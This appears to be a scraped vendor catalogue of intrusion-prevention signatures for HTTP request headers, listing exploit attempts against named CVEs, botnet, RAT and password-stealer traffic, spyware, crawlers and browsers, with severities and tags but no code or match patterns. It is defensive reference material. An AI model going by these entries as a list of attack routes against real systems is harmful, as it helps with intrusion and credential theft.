Vulnerability: Pgadmin-Pga4_session-Directory-Traversal
Description:
Back to top

HTTP_CSH-Phishing-URL-Accessed

About this situation: Access to phishing site detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Phishing-Related-URL
Description:
Back to top

HTTP_CSH-PHP-4-Unserialize-ZVAL-Reference-Counter-Overflow

About this situation: An attempt to exploit a PHP 4 Unserialize ZVAL Reference Counter Overflow vulnerability detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Linux, Any Hardware, PHP, CVE2007, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1644-5242
Vulnerability: PHP-4-Unserialize-ZVAL-Reference-Counter-Overflow
Description:
Back to top

HTTP_CSH-PHP-HTTP-Multipart-Form-Data-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-1528-5242
Vulnerability: PHP-HTTP-Multipart-Form-Data-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Php-Scripting-In-Client-Request

About this situation: Detected PHP scripting in the Client Request
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-572-5211
Vulnerability: Web-Server-Side-Script-Disclosure
Description:
Back to top

HTTP_CSH-Picsearch-psbot-Web-Spider

About this situation: Picsearch psbot web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Picsearch psbot, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Pivotal-RabbitMQ-X-reason-HTTP-Header-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Pivotal RabbitMQ detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Pivotal RabbitMQ, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1219-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Pivotal-RabbitMQ-X-reason-HTTP-Header-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Platrium-Weather-Service-Cookie

About this situation: Zango Platrium online games and weather software
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Platrium, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-1733-5242
Vulnerability: HTTP_Platrium-Weather-Service
Description:
Back to top

HTTP_CSH-Platrium-Weather-Service-User-Agent

About this situation: Zango Platrium online games and weather software
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Platrium, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-224-3038
Vulnerability: HTTP_Platrium-Weather-Service
Description:
Back to top

HTTP_CSH-Plugx-Trojan-Activity-Detected

About this situation: PlugX Trojan activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Plugx-Trojan-Activity-Detected
Description:
Back to top

HTTP_CSH-PopCap-UserAgent

About this situation: PopCap Games User-Agent
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, PopCap, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-224-3038
Vulnerability: HTTP_PopCap-Games
Description:
Back to top

HTTP_CSH-Popmonster

About this situation: PopMonster traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, PopMonster, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Popmonster
Description:
Back to top

HTTP_CSH-Portalscan

About this situation: PortalScan traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, PortalScan, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Portalscan
Description:
Back to top

HTTP_CSH-Possible-HTTP-Request-In-Trailers

About this situation: Suspicious HTTP trailers detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1702-5242
Last changed: sgpkg-ips-1702-5242
Description:
Back to top

HTTP_CSH-Possible-Netstat-Command-Usage-In-Referer-Header

About this situation: Possible netstat command usage in HTTP Referer header detected
Context: HTTP Request Header Line
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-466-5211
Vulnerability: System-Command-Usage
Description:
Back to top

HTTP_CSH-Possible-Ping-Command-Usage-In-Referer-Header

About this situation: Possible ping command usage in HTTP Referer header detected
Context: HTTP Request Header Line
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-466-5211
Vulnerability: System-Command-Usage
Description:
Back to top

HTTP_CSH-Possible-Script-In-Header

About this situation: Detects script within header lines
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-332-4219
Last changed: sgpkg-ips-448-4219
Vulnerability: HTTP-Php-Phpinfo-XSS
Description:
Back to top

HTTP_CSH-Possible-SQL-Injection

About this situation: Possible SQL Injection detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-787-5211
Vulnerability: SQL-Injection
Description:
Back to top

HTTP_CSH-PPStream-Client-Usage

About this situation: PPStream Client detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, PPStream, Any Operating System not specific, Streaming Protocols, TCP Client Traffic
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: PPStream-P2P-Internet-TV
Description:
Back to top

HTTP_CSH-Precisionpop

About this situation: PrecisionPop traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, PrecisionPop, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Precisionpop
Description:
Back to top

HTTP_CSH-Progress-Kemp-Loadmaster-Rest-API-Command-Injection

About this situation: An attempt to exploit a vulnerability in Progress Kemp LoadMaster detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Progress Software Kemp LoadMaster, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Vulnerability: Progress-Kemp-Loadmaster-Rest-API-Command-Injection
Description:
Back to top

HTTP_CSH-Progress-MOVEit-Transfer-Silcerttouser-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Progress Software MOVEit Transfer detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, MOVEit, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1602-5242
Last changed: sgpkg-ips-1605-5242
Vulnerability: Progress-MOVEit-Transfer-Silcerttouser-SQL-Injection
Progress-MOVEit-Transfer-Userengine-Usercheckclientcert-SQL-Injection
Description:
Back to top

HTTP_CSH-Progress-MOVEit-Transfer-SQL-Injection-CVE-2023-34362

About this situation: An attempt to exploit a vulnerability in MOVEit Transfer detected
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, MOVEit, CVE2023, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1598-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: Progress-MOVEit-Transfer-SQL-Injection-CVE-2023-34362
Description:
Back to top

HTTP_CSH-Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Progress Software MOVEit Transfer detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, MOVEit, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1611-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection
Description:
Back to top

HTTP_CSH-ProSafe-Management-System-Arbitrary-File-Upload-Vulnerability

About this situation: An attempt to exploit a vulnerability in Netgear ProSafe Management System detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, NetGear NMS300, CVE2016, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1529-5242
Vulnerability: ProSafe-Management-System-Arbitrary-File-Upload-Vulnerability
Description:
Back to top

HTTP_CSH-Proxy-Header

About this situation: An HTTP proxy header was seen
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-780-5211
Description:
Back to top

HTTP_CSH-PycURL-Crawler

About this situation: PycURL Crawler detected.
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic web spider, Any Operating System not specific, Generic web spider not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-516-5211
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Python-Urllib-Robot

About this situation: Python Urllib Robot detected.
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic web spider, Any Operating System not specific, Generic web spider not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-516-5211
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Pyxie-RAT-Infection-Traffic

About this situation: PyXie RAT infection traffic was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: Pyxie-RAT-Infection-Traffic
Description:
Back to top

HTTP_CSH-QQ-Password-Stealer

About this situation: QQ password stealer traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, QQ, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Description:
Back to top

HTTP_CSH-Radian6-RSS-Feed-Crawler

About this situation: Radian6 RSS Feed Crawler detected.
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic web spider, Any Operating System not specific, Generic web spider not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-516-5211
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-RapidShare-Access

About this situation: Detects RapidShare access
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Rapidshare, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-408-4219
Vulnerability: RapidShare-File-Sharing-Service
Description:
Back to top

HTTP_CSH-RealNetworks-Helix-Server-NTLM-Authentication-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in RealNetworks Helix Mobile Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, RealNetworks Helix Server, CVE2010, Any Operating System not specific, RealNetworks Helix Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-1589-5242
Vulnerability: RealNetworks-Helix-Server-NTLM-Authentication-Heap-Overflow
Description:
Back to top

HTTP_CSH-Realtek-SDK-UPnP-Callback-Stack-Buffer-Overflow-CVE-2021-35392

About this situation: An attempt to exploit a vulnerability in Realtek SDK was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Realtek SDK, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Realtek-SDK-UPnP-Callback-Stack-Buffer-Overflow-CVE-2021-35392
Description:
Back to top

HTTP_CSH-Red-Hat-Directory-Server-Accept-Language-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Red Hat Directory Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Red Hat Directory Server, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1470-5242
Vulnerability: Red-Hat-Directory-Server-Accept-Language-Parsing-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Red-October-Activity

About this situation: Red October activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Red-October
Description:
Back to top

HTTP_CSH-Redgirl-Bot-Traffic

About this situation: RedGirl Bot traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Redgirl-Bot
Description:
Back to top

HTTP_CSH-Redline-Password-Stealer-Infection-Traffic

About this situation: Redline Password Stealer infection traffic was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Redline-Password-Stealer-Infection-Traffic
Description:
Back to top

HTTP_CSH-Referer-XSS

About this situation: Detects suspicious HTTP Referer header fields
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2001, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: HTTP-Webalizer-Cross-Site
Description:
Back to top

HTTP_CSH-Request-With-Multiple-Header-Lines-With-Empty-Content

About this situation: A suspicious HTTP request detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Apache Software Foundation httpd, CVE2018, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1130-5242
Last changed: sgpkg-ips-1132-5242
Vulnerability: Apache-Httpd-Mod_Cache_socache-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Rhino-Software-Serv-U-Web-Client-Request-Remote-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Rhino Software Serv-U detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Serv-U HTTP Server, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1732-5242
Vulnerability: Rhino-Software-Serv-U-Web-Client-Request-Remote-Buffer-Overflow
Description:
Back to top

HTTP_CSH-rtorrent-Client

About this situation: rtorrent P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, rtorrent, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-Ruby-WEBrick-Denial-Of-Service

About this situation: An attempt to exploit a Ruby WEBrick Denial Of Service vulnerability detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, WEBrick, CVE2008, Any Operating System not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-1528-5242
Vulnerability: Ruby-WEBrick-Denial-Of-Service
Description:
Back to top

HTTP_CSH-RubyGems-Usage

About this situation: RubyGems usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, RubyGems, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-RX-Toolbar-Activity

About this situation: RX Toolbar activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, RX Toolbar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: RX-Toolbar
Description:
Back to top

HTTP_CSH-Safari-Browser-Usage

About this situation: Safari browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Safari, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Sality-Virus-User-Agent

About this situation: Sality virus user agent detected in a HTTP request
Context: HTTP Request Header Line
Severity: 10
Tags: Windows, Any Hardware, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-531-5211
Vulnerability: Sality-Virus
Description:
Back to top

HTTP_CSH-Samba-Swat-HTTP-Authentication-Buffer-Overflow

About this situation: A Samba Swat HTTP Authentication Buffer Overflow vulnerability
Context: HTTP Request Header Line
Severity: 7
Tags: Linux, Any Hardware, Samba, CVE2004, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1588-5242
Vulnerability: Samba-Swat-HTTP-Authentication-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Samsung-Browser-Usage

About this situation: Samsung Browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Samsung Browser, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-SAP-Internet-Communication-Manager-HTTP-Request-Smuggling

About this situation: An attempt to exploit a vulnerability in SAP Internet Communication Manager detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, SAP, CVE2022, Windows not specific, SAP not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1833-5242
Last changed: sgpkg-ips-1833-5242
Vulnerability: SAP-Internet-Communication-Manager-HTTP-Request-Smuggling
Description:
Back to top

HTTP_CSH-Sapphire-Web-Spider

About this situation: Sapphire web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sapphire, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-207-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-SaveNow-Activity

About this situation: Detects SaveNow client activity
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, x86, SaveNow, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-1641-5242
Vulnerability: SaveNow-Software
Description:
Back to top

HTTP_CSH-Schneider-Electric-ClearSCADA-DoS2

About this situation: An attempt to exploit a vulnerability in Schneider Electric ClearSCADA detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Schneider Electric ClearSCADA, Windows not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1257-5242
Vulnerability: Schneider-Electric-ClearSCADA-DoS2
Description:
Back to top

HTTP_CSH-Schneider-Electric-Modicon-M340-Buffer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in Schneider Electric Modicon M340 detected
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, Schneider Electric Modicon M340, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-715-5211
Vulnerability: Schneider-Electric-Modicon-M340-Buffer-Overflow-Vulnerability
Description:
Back to top

HTTP_CSH-ScoutJet-Web-Spider

About this situation: ScoutJet web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, ScoutJet, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Script-In-Host-Header

About this situation: Detects Script tag within Host header
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2002, Any Operating System not specific, Apache not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-171-2032
Last changed: sgpkg-ips-1641-5242
Vulnerability: HTTP-Apache-Host-Header-Default-Error-Page-XSS
Description:
Back to top

HTTP_CSH-Searchme-Charlotte-Web-Spider

About this situation: Searchme's Charlotte web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Searchme Charlotte, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Searchmyrequest

About this situation: SearchMyRequest traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, SearchMyRequest, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Searchmyrequest
Description:
Back to top

HTTP_CSH-Shady-RAT-Backdoor-Traffic

About this situation: Shady RAT backdoor traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Shady-RAT-Backdoor
Description:
Back to top

HTTP_CSH-Shareaza-P2P-Client

About this situation: Shareaza P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic, 2nd Most Recent Update, 3rd Most Recent Update, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1872-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_CSH-ShellCode-In-User-Agent

About this situation: User Agent String seems to contain shellcode
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2007, Any Operating System not specific, Apache not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-180-2032
Last changed: sgpkg-ips-1258-5242
Vulnerability: Apache-Tomcat-Mod_jk.so-URI-Worker-Long-Url-Buffer-Overflow
HTTP_Binary-In-User-Agent-String
Description:
Back to top

HTTP_CSH-Shopathome

About this situation: ShopAtHome activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, ShopAtHome, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Shopathome
Description:
Back to top

HTTP_CSH-Shopnav

About this situation: ShopNav traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, ShopNav, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Shopnav
Description:
Back to top

HTTP_CSH-Sitecore-Multiple-Products-ThumbnailsAccessToken-Insecure-Deserialization-CVE-2025-27218

About this situation: An attempt to exploit a vulnerability in Sitecore Experience Manager detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sitecore XP, CVE2025, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Sitecore-Multiple-Products-ThumbnailsAccessToken-Insecure-Deserialization
Description:
Back to top

HTTP_CSH-SNIProxy-New_address-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SNIProxy detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, SNIProxy, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: SNIProxy-New_address-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Solarwinds-Web-Help-Desk-Hard-Coded-Credentials

About this situation: An attempt to exploit a vulnerability in SolarWinds Web Help Desk
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Web Help Desk, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1789-5242
Last changed: sgpkg-ips-1789-5242
Vulnerability: Solarwinds-Web-Help-Desk-Hard-Coded-Credentials
Description:
Back to top

HTTP_CSH-SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection

